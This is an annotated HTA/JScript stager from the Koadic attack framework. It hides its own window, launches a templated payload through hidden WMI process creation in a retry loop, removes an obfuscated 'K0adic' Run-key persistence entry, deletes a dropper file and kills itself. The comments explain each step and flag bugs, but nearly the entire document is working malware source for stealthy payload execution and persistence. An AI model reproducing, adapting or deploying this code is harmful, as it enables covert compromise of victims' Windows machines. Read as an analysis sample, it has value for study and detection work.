<html> | |
<head> | |
<script language="JScript"> | |
// Window-hiding prologue: push the HTA window far off-screen, drop keyboard
// focus and shrink it to 2x4 px so nothing is visible on the desktop.
window.moveTo(-1337, -2019);
window.blur();
window.resizeTo(2, 4);
try
{
    // Install an onerror handler that returns false; whether the host still
    // shows an error dialog for a false return is host-dependent — confirm.
    window.onerror = function(sMsg, sUrl, sLine) { return false; }
    // Any focus gained by the window is immediately given up again.
    window.onfocus = function() { window.blur(); }
}
catch (e){}  // best-effort: failures to set the handlers are ignored
// Root namespace for the script plus the two COM objects everything else uses:
// WScript.Shell (environment expansion, Run) and the Scripting FileSystemObject
// (file deletion). Both are created eagerly, so an ActiveX block here stops the script.
var Koadic = {};
Koadic.WS = new ActiveXObject("WScript.Shell");
Koadic.FS = new ActiveXObject("Scripting.FileSystemObject");
// Returns true when a global `window` exists, which is how the script decides
// it is running inside an HTA host rather than a plain script host.
Koadic.isHTA = function()
{
    return typeof(window) !== "undefined";
}
Koadic.process = {};
// Determines this script's own process id indirectly: spawn a throw-away
// `cmd /K hostname` child via WMI, look the child up in the Win32_Process list,
// read its ParentProcessId (i.e. us), then terminate the child.
// Returns: the parent pid as reported by WMI.
// Note: if the child is not found in the listing, `latestProc` stays null and
// the `.ParentProcessId` access below throws; callers wrap this in try/catch.
Koadic.process.currentPID = function()
{
    var cmd = Koadic.file.getPath("%comspec% /K hostname");
    var childPid = Koadic.WMI.createProcess(cmd);
    var pid = -1;
    var latestTime = 0;   // unused
    var latestProc = null;
    var processes = Koadic.process.list();
    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();
        try
        {
            // loose comparison: ProcessId is a WMI number, childPid comes from outParams
            if (proc.ProcessId == childPid)
            {
                latestProc = proc;
                break;
            }
        } catch (e)
        {
            // a process object that cannot be read is skipped
        }
        items.moveNext();
    }
    pid = latestProc.ParentProcessId;
    latestProc.Terminate();   // clean up the helper cmd.exe
    return pid;
}
// Walks the Win32_Process listing and terminates the first process whose
// ProcessId equals `pid`.
// Returns: true if a matching process was found and Terminate() did not throw,
// false if no process with that id is listed.
// This function is redefined, byte-for-byte identically, later in the file;
// the later assignment is the one in effect when the main loop runs.
Koadic.process.kill = function(pid)
{
    var processes = Koadic.process.list();
    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();
        try
        {
            if (proc.ProcessId == pid)
            {
                proc.Terminate();
                return true;
            }
        } catch (e)
        {
            // unreadable entry or failed Terminate(): keep scanning
        }
        items.moveNext();
    }
    return false;
}
// Returns the WMI result set of every Win32_Process on the local machine
// (root\cimv2 namespace, impersonating the calling user).
// Callers iterate it with an Enumerator.
Koadic.process.list = function()
{
    var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
    var query = "Select * From Win32_Process";
    return wmi.ExecQuery(query);
}
// Terminates the script by escalating through several strategies, each one
// wrapped in its own try/catch so a failure falls through to the next:
//   1. in an HTA host, the various window.close()/self.close() forms;
//   2. WScript.quit() (only resolves when a WScript host object exists —
//      presumably not inside an HTA, where it would throw and be swallowed);
//   3. as a last resort, look up our own pid (via currentPID) and terminate it.
Koadic.exit = function()
{
    if (Koadic.isHTA())
    {
        try {
            window.close();
        } catch(e){}
        try {
            window.self.close();
        } catch (e){}
        try {
            window.top.close();
        } catch (e){}
        try{
            self.close();
        } catch (e){}
        try
        {
            // re-open the current window in-place first so close() is permitted
            window.open('', '_self', '');
            window.close();
        }
        catch (e)
        {
        }
    }
    try
    {
        WScript.quit();
    }
    catch (e)
    {
    }
    try
    {
        // self-termination through WMI; currentPID spawns and kills a helper cmd.exe
        var pid = Koadic.process.currentPID();
        Koadic.process.kill(pid);
    }
    catch (e)
    {
    }
}
Koadic.WMI = {};
// Starts `cmd` through WMI Win32_Process.Create rather than WScript.Shell.Run,
// with a Win32_ProcessStartup that hides the window (ShowWindow = SW_HIDE)
// and places it at 1x1 px. CreateFlags 16777216 is 0x01000000, the value of
// CREATE_BREAKAWAY_FROM_JOB.
// Returns: outParams.ProcessId; the method's return code is not checked, so on
// failure the returned value is presumably undefined/0 — not validated here.
// Note the `ySize` (lower-case y) property next to `XSize`; whether WMI accepts
// that spelling is not verified by this code.
Koadic.WMI.createProcess = function(cmd)
{
    var SW_HIDE = 0;
    var pid = 0;   // unused
    var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
    var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
    si.ShowWindow = SW_HIDE;
    si.CreateFlags = 16777216;
    si.X = si.Y = si.XSize = si.ySize = 1;
    var w32proc = wmi.Get("Win32_Process");
    var method = w32proc.Methods_.Item("Create");
    var inParams = method.InParameters.SpawnInstance_();
    inParams.CommandLine = cmd;
    inParams.CurrentDirectory = null;
    inParams.ProcessStartupInformation = si;
    var outParams = w32proc.ExecMethod_("Create", inParams);
    return outParams.ProcessId;
}
// Second, identical definition of Koadic.process.kill (the first one appears
// earlier in the file); this assignment is the one in effect at run time.
// Terminates the first listed process whose ProcessId equals `pid`.
// Returns: true when a match was found and terminated, false otherwise.
Koadic.process.kill = function(pid)
{
    var processes = Koadic.process.list();
    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();
        try
        {
            if (proc.ProcessId == pid)
            {
                proc.Terminate();
                return true;
            }
        } catch (e)
        {
            // unreadable entry or failed Terminate(): keep scanning
        }
        items.moveNext();
    }
    return false;
}
Koadic.file = {};
// Expands %VAR% environment references in `path` via WScript.Shell and
// returns the expanded string (used for %comspec% and similar).
Koadic.file.getPath = function(path)
{
    return Koadic.WS.ExpandEnvironmentStrings(path);
}
// Deletes the file at `path` (after environment expansion) through the
// FileSystemObject; the second argument `true` is the force flag, so
// read-only files are removed too. Errors propagate to the caller.
Koadic.file.deleteFile = function(path)
{
    Koadic.FS.DeleteFile(Koadic.file.getPath(path), true);
};
Koadic.shell = {};
// Runs `cmd` with WScript.Shell.Run, window style 0 (hidden). `fork` defaults
// to true; Run's third argument is !fork, so fork=false makes the call block
// until the command exits (that is how the file implements sleeps via ping).
// Note: `c` (the "%comspec% /q /c" wrapper) is built but never used — the raw
// `cmd` string is what is passed to Run.
Koadic.shell.run = function(cmd, fork)
{
    var fork = (typeof(fork) !== "undefined") ? fork : true;
    var c = "%comspec% /q /c " + cmd;
    Koadic.WS.Run(cmd, 0, !fork);
}
Koadic.persist = {};
// Launches `cmd` via WMI (hidden window), then blocks on `ping 127.0.0.1 -n 11`
// — a loopback ping used as a roughly ten-second sleep — before returning the
// new process id to the caller, which then checks whether it is still alive.
Koadic.persist.run = function(cmd)
{
    var pid = Koadic.WMI.createProcess(cmd);
    Koadic.shell.run('ping 127.0.0.1 -n 11', false);
    return pid;
}
// Removes the persistence artifacts. `~HKEY~` and `~DROPPERPATH~` look like
// substitution tokens filled in before delivery (TODO confirm); 0x80000001 and
// 0x80000002 are the HKEY_CURRENT_USER / HKEY_LOCAL_MACHINE handle values.
// The registry path and value name are assembled from split string fragments;
// they concatenate to "Software\Microsoft\Windows\CurrentVersion\Run" and
// "K0adic", i.e. the standard per-user/per-machine Run key — a useful place to
// look when triaging a host. The `reg delete` is launched with the default
// fork=true, so it is not awaited.
// Note: `Koadic.delete` is not defined anywhere in this file, so the last line
// throws a TypeError; the caller's try/catch swallows it and the dropper file
// referenced there is left on disk.
Koadic.persist.clean = function()
{
    var hkey = ~HKEY~;
    var hkeyname = "";
    switch(hkey)
    {
        case 0x80000001:
            hkeyname = "HKCU";
            break;
        case 0x80000002:
            hkeyname = "HKLM";
            break;
        default:
            break;   // any other hive leaves hkeyname empty, producing "\Software\..."
    }
    var path = "Soft"+"ware\\Micros"+"oft\\Wi"+"ndows\\Cur"+"rentVer"+"sion\\Ru"+"n";
    var key = "K0"+"adic";
    Koadic.shell.run("reg delete "+hkeyname+"\\"+path+" /v "+key+" /f");
    Koadic.delete.file("~DROPPERPATH~");
}
// Main loop. `~RETRYATTEMPTS~`, `~RETRYDELAY~` and `~PAYLOAD~` look like
// substitution tokens filled in before delivery (TODO confirm). attempts == -1
// means retry forever; delay is the token value plus one, used as the ping
// count for the inter-iteration sleep.
// Each iteration: launch the payload (persist.run waits ~10 s), then try to
// kill it. If kill() returns true (the payload was still listed and was
// terminated) this counts as a retry: decrement attempts, run clean() and stop
// once they reach zero, otherwise sleep `delay` seconds and loop. If kill()
// returns false (the payload is no longer listed) the loop ends.
// Any exception — including the TypeError from persist.clean — is swallowed
// by the outer catch, after which the script terminates itself via Koadic.exit.
try
{
    var attempts = ~RETRYATTEMPTS~;
    var delay = ~RETRYDELAY~ + 1;
    var infflag = false;
    if (attempts == -1)
    {
        infflag = true;
    }
    while (true)
    {
        var pid = Koadic.persist.run("~PAYLOAD~");
        if (Koadic.process.kill(pid))
        {
            if (!infflag)
            {
                attempts -= 1;
                if (attempts == 0)
                {
                    Koadic.persist.clean();
                    break;
                }
            }
            // blocking sleep: fork=false makes shell.run wait for ping to finish
            Koadic.shell.run('ping 127.0.0.1 -n '+delay.toString(), false);
        }
        else
        {
            break;
        }
    }
}
catch(e)
{
    //do nothing
}
Koadic.exit();
</script>
<hta:application caption="no" windowState="minimize" showInTaskBar="no"
scroll="no" navigable="no" />
<!-- hta:application attributes: no caption, start minimized, hidden from the
     taskbar, no scrollbars, not navigable — together with the script's
     moveTo/resizeTo/blur calls this keeps the HTA window out of sight. -->
</head>
<body>
</body>
</html>